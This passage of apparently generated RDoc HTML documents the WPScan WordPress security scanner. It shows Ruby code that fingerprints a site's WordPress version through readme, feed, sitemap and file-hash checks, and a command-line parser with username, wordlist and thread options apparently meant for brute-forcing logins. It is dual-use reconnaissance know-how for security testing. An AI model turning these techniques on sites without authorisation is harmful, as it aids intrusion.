<span class="ruby-identifier">wp_content</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_content_dir</span>]
<span class="ruby-identifier">wp_plugins</span> = <span class="ruby-node">&quot;#{wp_content}/plugins&quot;</span>
<span class="ruby-identifier">file_url</span> = <span class="ruby-identifier">target_uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-identifier">node</span>.<span class="ruby-identifier">attribute</span>(<span class="ruby-string">'src'</span>).<span class="ruby-identifier">text</span>).<span class="ruby-identifier">to_s</span>
<span class="ruby-identifier">file_url</span> = <span class="ruby-identifier">file_url</span>.<span class="ruby-identifier">gsub</span>(<span class="ruby-regexp">/\$wp-plugins\$/</span>, <span class="ruby-identifier">wp_plugins</span>).<span class="ruby-identifier">gsub</span>(<span class="ruby-regexp">/\$wp-content\$/</span>, <span class="ruby-identifier">wp_content</span>)
<span class="ruby-identifier">response</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">file_url</span>)
<span class="ruby-identifier">md5sum</span> = <span class="ruby-constant">Digest</span><span class="ruby-operator">::</span><span class="ruby-constant">MD5</span>.<span class="ruby-identifier">hexdigest</span>(<span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span>)
<span class="ruby-identifier">node</span>.<span class="ruby-identifier">search</span>(<span class="ruby-string">'hash'</span>).<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">hash</span><span class="ruby-operator">|</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">hash</span>.<span class="ruby-identifier">attribute</span>(<span class="ruby-string">'md5'</span>).<span class="ruby-identifier">text</span> <span class="ruby-operator">==</span> <span class="ruby-identifier">md5sum</span>
<span class="ruby-keyword">return</span> <span class="ruby-identifier">hash</span>.<span class="ruby-identifier">search</span>(<span class="ruby-string">'versions'</span>).<span class="ruby-identifier">text</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">nil</span> <span class="ruby-comment"># Otherwise the data['file'] is returned (issue #107)</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- find_from_advanced_fingerprinting-source -->
</div>
</div><!-- find_from_advanced_fingerprinting-method -->
<div id="find_from_links_opml-method" class="method-detail ">
<a name="method-c-find_from_links_opml"></a>
<div class="method-heading">
<span class="method-name">find_from_links_opml</span><span
class="method-args">(options)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="find_from_links_opml-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_version.rb, line 130</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">find_from_links_opml</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-identifier">target_uri</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:base_url</span>]
<span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">target_uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;wp-links-opml.php&quot;</span>).<span class="ruby-identifier">to_s</span>).<span class="ruby-identifier">body</span>[<span class="ruby-node">%{generator=&quot;wordpress/#{WpVersion.version_pattern}&quot;}</span>, <span class="ruby-value">1</span>]
<span class="ruby-keyword">end</span></pre>
</div><!-- find_from_links_opml-source -->
</div>
</div><!-- find_from_links_opml-method -->
<div id="find_from_meta_generator-method" class="method-detail ">
<a name="method-c-find_from_meta_generator"></a>
<div class="method-heading">
<span class="method-name">find_from_meta_generator</span><span
class="method-args">(options)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Attempts to find the wordpress version from, the generator meta tag in the
html source.</p>
<p>The meta tag can be removed however it seems, that it is reinstated on
upgrade.</p>
<div class="method-source-code" id="find_from_meta_generator-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_version.rb, line 61</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">find_from_meta_generator</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-identifier">target_uri</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:base_url</span>]
<span class="ruby-identifier">response</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">target_uri</span>.<span class="ruby-identifier">to_s</span>, {<span class="ruby-value">:follow_location</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-keyword">true</span>, <span class="ruby-value">:max_redirects</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-value">2</span>})
<span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span>[<span class="ruby-regexp">%{name=&quot;generator&quot; content=&quot;wordpress ([^&quot;]+)&quot;}</span>, <span class="ruby-value">1</span>]
<span class="ruby-keyword">end</span></pre>
</div><!-- find_from_meta_generator-source -->
</div>
</div><!-- find_from_meta_generator-method -->
<div id="find_from_readme-method" class="method-detail ">
<a name="method-c-find_from_readme"></a>
<div class="method-heading">
<span class="method-name">find_from_readme</span><span
class="method-args">(options)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="find_from_readme-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_version.rb, line 119</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">find_from_readme</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-identifier">target_uri</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:base_url</span>]
<span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">target_uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;readme.html&quot;</span>).<span class="ruby-identifier">to_s</span>).<span class="ruby-identifier">body</span>[<span class="ruby-node">%{&lt;br /&gt;\sversion #{WpVersion.version_pattern}}</span>, <span class="ruby-value">1</span>]
<span class="ruby-keyword">end</span></pre>
</div><!-- find_from_readme-source -->
</div>
</div><!-- find_from_readme-method -->
<div id="find_from_rss_generator-method" class="method-detail ">
<a name="method-c-find_from_rss_generator"></a>
<div class="method-heading">
<span class="method-name">find_from_rss_generator</span><span
class="method-args">(options)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="find_from_rss_generator-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_version.rb, line 68</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">find_from_rss_generator</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-identifier">target_uri</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:base_url</span>]
<span class="ruby-identifier">response</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">target_uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;feed/&quot;</span>).<span class="ruby-identifier">to_s</span>, {<span class="ruby-value">:follow_location</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-keyword">true</span>, <span class="ruby-value">:max_redirects</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-value">2</span>})
<span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span>[<span class="ruby-regexp">%{&lt;generator&gt;http://wordpress.org/\?v=([^&lt;]+)&lt;/generator&gt;}</span>, <span class="ruby-value">1</span>]
<span class="ruby-keyword">end</span></pre>
</div><!-- find_from_rss_generator-source -->
</div>
</div><!-- find_from_rss_generator-method -->
<div id="find_from_sitemap_generator-method" class="method-detail ">
<a name="method-c-find_from_sitemap_generator"></a>
<div class="method-heading">
<span class="method-name">find_from_sitemap_generator</span><span
class="method-args">(options)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p><a
href="http://code.google.com/p/wpscan/issues/detail?id=109">code.google.com/p/wpscan/issues/detail?id=109</a></p>
<div class="method-source-code" id="find_from_sitemap_generator-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_version.rb, line 125</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">find_from_sitemap_generator</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-identifier">target_uri</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:base_url</span>]
<span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">target_uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;sitemap.xml&quot;</span>).<span class="ruby-identifier">to_s</span>).<span class="ruby-identifier">body</span>[<span class="ruby-node">%{generator=&quot;wordpress/#{WpVersion.version_pattern}&quot;}</span>, <span class="ruby-value">1</span>]
<span class="ruby-keyword">end</span></pre>
</div><!-- find_from_sitemap_generator-source -->
</div>
</div><!-- find_from_sitemap_generator-method -->
<div id="version_pattern-method" class="method-detail ">
<a name="method-c-version_pattern"></a>
<div class="method-heading">
<span class="method-name">version_pattern</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Used to check if the version is correct : must contain at least one .</p>
<div class="method-source-code" id="version_pattern-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_version.rb, line 136</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">version_pattern</span>
<span class="ruby-string">'([^\r\n]+[\.][^\r\n]+)'</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- version_pattern-source -->
</div>
</div><!-- version_pattern-method -->
</div><!-- protected-class-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

320
doc/WpVulnerability.html Normal file
View File

@@ -0,0 +1,320 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: WpVulnerability</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/wp_vulnerability_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/wp_vulnerability.rb">lib/wpscan/wp_vulnerability.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-new">::new</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">WpVulnerability</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Attributes -->
<div id="attribute-method-details" class="method-section section">
<h3 class="section-header">Attributes</h3>
<div id="reference-attribute-method" class="method-detail">
<a name="reference"></a>
<a name="reference="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">reference</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="title-attribute-method" class="method-detail">
<a name="title"></a>
<a name="title="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">title</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="type-attribute-method" class="method-detail">
<a name="type"></a>
<a name="type="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">type</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
</div><!-- attribute-method-details -->
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">(title, reference, type)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_vulnerability.rb, line 22</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>(<span class="ruby-identifier">title</span>, <span class="ruby-identifier">reference</span>, <span class="ruby-identifier">type</span>)
<span class="ruby-ivar">@title</span> = <span class="ruby-identifier">title</span>
<span class="ruby-ivar">@reference</span> = <span class="ruby-identifier">reference</span>
<span class="ruby-ivar">@type</span> = <span class="ruby-identifier">type</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
</div><!-- public-class-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

984
doc/WpscanOptions.html Normal file
View File

@@ -0,0 +1,984 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: WpscanOptions</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/wpscan_options_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/wpscan_options.rb">lib/wpscan/wpscan_options.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-clean_option">::clean_option</a></li>
<li><a href="#method-c-get_opt_long">::get_opt_long</a></li>
<li><a href="#method-c-is_long_option-3F">::is_long_option?</a></li>
<li><a href="#method-c-load_from_arguments">::load_from_arguments</a></li>
<li><a href="#method-c-new">::new</a></li>
<li><a href="#method-c-option_to_instance_variable_setter">::option_to_instance_variable_setter</a></li>
<li><a href="#method-i-enumerate_only_vulnerable_plugins-3D">#enumerate_only_vulnerable_plugins=</a></li>
<li><a href="#method-i-enumerate_only_vulnerable_themes-3D">#enumerate_only_vulnerable_themes=</a></li>
<li><a href="#method-i-enumerate_options_from_string">#enumerate_options_from_string</a></li>
<li><a href="#method-i-enumerate_plugins-3D">#enumerate_plugins=</a></li>
<li><a href="#method-i-enumerate_themes-3D">#enumerate_themes=</a></li>
<li><a href="#method-i-has_options-3F">#has_options?</a></li>
<li><a href="#method-i-proxy-3D">#proxy=</a></li>
<li><a href="#method-i-set_option_from_cli">#set_option_from_cli</a></li>
<li><a href="#method-i-threads-3D">#threads=</a></li>
<li><a href="#method-i-to_h">#to_h</a></li>
<li><a href="#method-i-url-3D">#url=</a></li>
<li><a href="#method-i-wordlist-3D">#wordlist=</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">WpscanOptions</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Constants -->
<div id="constants-list" class="section">
<h3 class="section-header">Constants</h3>
<dl>
<dt><a name="ACCESSOR_OPTIONS">ACCESSOR_OPTIONS</a></dt>
<dd class="description"></dd>
</dl>
</div>
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="load_from_arguments-method" class="method-detail ">
<a name="method-c-load_from_arguments"></a>
<div class="method-heading">
<span class="method-name">load_from_arguments</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Will load the options from ARGV return <a
href="WpscanOptions.html">WpscanOptions</a></p>
<div class="method-source-code" id="load_from_arguments-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wpscan_options.rb, line 129</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">load_from_arguments</span>
<span class="ruby-identifier">wpscan_options</span> = <span class="ruby-constant">WpscanOptions</span>.<span class="ruby-identifier">new</span>
<span class="ruby-keyword">if</span> <span class="ruby-constant">ARGV</span>.<span class="ruby-identifier">length</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">0</span>
<span class="ruby-constant">WpscanOptions</span>.<span class="ruby-identifier">get_opt_long</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">opt</span>, <span class="ruby-identifier">arg</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">wpscan_options</span>.<span class="ruby-identifier">set_option_from_cli</span>(<span class="ruby-identifier">opt</span>, <span class="ruby-identifier">arg</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">wpscan_options</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- load_from_arguments-source -->
</div>
</div><!-- load_from_arguments-method -->
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wpscan_options.rb, line 47</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
</div><!-- public-class-method-details -->
<div id="protected-class-method-details" class="method-section section">
<h3 class="section-header">Protected Class Methods</h3>
<div id="clean_option-method" class="method-detail ">
<a name="method-c-clean_option"></a>
<div class="method-heading">
<span class="method-name">clean_option</span><span
class="method-args">(option)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Will removed the - or chars at the beginning of option and replace
any remaining - by _</p>
<p>param string option return string</p>
<div class="method-source-code" id="clean_option-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wpscan_options.rb, line 217</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">clean_option</span>(<span class="ruby-identifier">option</span>)
<span class="ruby-identifier">cleaned_option</span> = <span class="ruby-identifier">option</span>.<span class="ruby-identifier">gsub</span>(<span class="ruby-regexp">/^--?/</span>, <span class="ruby-string">''</span>)
<span class="ruby-identifier">cleaned_option</span>.<span class="ruby-identifier">gsub</span>(<span class="ruby-regexp">/-/</span>, <span class="ruby-string">'_'</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- clean_option-source -->
</div>
</div><!-- clean_option-method -->
<div id="get_opt_long-method" class="method-detail ">
<a name="method-c-get_opt_long"></a>
<div class="method-heading">
<span class="method-name">get_opt_long</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Even if a short option is given (IE : -u), the long one will be returned
(IE : url)</p>
<div class="method-source-code" id="get_opt_long-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wpscan_options.rb, line 189</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">get_opt_long</span>
<span class="ruby-constant">GetoptLong</span>.<span class="ruby-identifier">new</span>(
[<span class="ruby-string">&quot;--url&quot;</span>, <span class="ruby-string">&quot;-u&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">REQUIRED_ARGUMENT</span>],
[<span class="ruby-string">&quot;--enumerate&quot;</span>, <span class="ruby-string">&quot;-e&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">OPTIONAL_ARGUMENT</span>],
[<span class="ruby-string">&quot;--username&quot;</span>, <span class="ruby-string">&quot;-U&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">REQUIRED_ARGUMENT</span>],
[<span class="ruby-string">&quot;--wordlist&quot;</span>, <span class="ruby-string">&quot;-w&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">REQUIRED_ARGUMENT</span>],
[<span class="ruby-string">&quot;--threads&quot;</span>, <span class="ruby-string">&quot;-t&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">REQUIRED_ARGUMENT</span>],
[<span class="ruby-string">&quot;--force&quot;</span>, <span class="ruby-string">&quot;-f&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">NO_ARGUMENT</span>],
[<span class="ruby-string">&quot;--help&quot;</span>, <span class="ruby-string">&quot;-h&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">NO_ARGUMENT</span>],
[<span class="ruby-string">&quot;--verbose&quot;</span>, <span class="ruby-string">&quot;-v&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">NO_ARGUMENT</span>],
[<span class="ruby-string">&quot;--proxy&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">OPTIONAL_ARGUMENT</span>],
[<span class="ruby-string">&quot;--update&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">NO_ARGUMENT</span>],
[<span class="ruby-string">&quot;--follow-redirection&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">NO_ARGUMENT</span>],
[<span class="ruby-string">&quot;--wp-content-dir&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">REQUIRED_ARGUMENT</span>],
[<span class="ruby-string">&quot;--wp-plugins-dir&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">REQUIRED_ARGUMENT</span>],
[<span class="ruby-string">&quot;--config-file&quot;</span>, <span class="ruby-string">&quot;-c&quot;</span>, <span class="ruby-constant">GetoptLong</span><span class="ruby-operator">::</span><span class="ruby-constant">REQUIRED_ARGUMENT</span>]
)
<span class="ruby-keyword">end</span></pre>
</div><!-- get_opt_long-source -->
</div>
</div><!-- get_opt_long-method -->
<div id="is_long_option-3F-method" class="method-detail ">
<a name="method-c-is_long_option-3F"></a>
<div class="method-heading">
<span class="method-name">is_long_option?</span><span
class="method-args">(option)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
